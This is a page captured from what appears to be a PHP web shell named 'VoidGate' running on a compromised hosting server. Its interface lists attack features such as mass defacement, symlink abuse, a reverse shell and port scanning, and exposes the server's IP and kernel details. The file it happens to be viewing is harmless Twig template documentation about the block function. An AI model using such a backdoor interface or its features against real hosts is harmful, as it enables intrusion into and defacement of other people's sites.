ヤミRoot VoidGate
User / IP
:
216.73.216.33
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
vendor
/
twig
/
twig
/
doc
/
functions
/
Viewing: block.rst
``block`` ========= When a template uses inheritance and if you want to print a block multiple times, use the ``block`` function: .. code-block:: jinja <title>{% block title %}{% endblock %}</title> <h1>{{ block('title') }}</h1> {% block body %}{% endblock %} The ``block`` function can also be used to display one block from another template: .. code-block:: jinja {{ block("title", "common_blocks.twig") }} Use the ``defined`` test to check if a block exists in the context of the current template: .. code-block:: jinja {% if block("footer") is defined %} ... {% endif %} {% if block("footer", "common_blocks.twig") is defined %} ... {% endif %} .. seealso:: :doc:`extends<../tags/extends>`, :doc:`parent<../functions/parent>`
Coded With 💗 by
0x6ick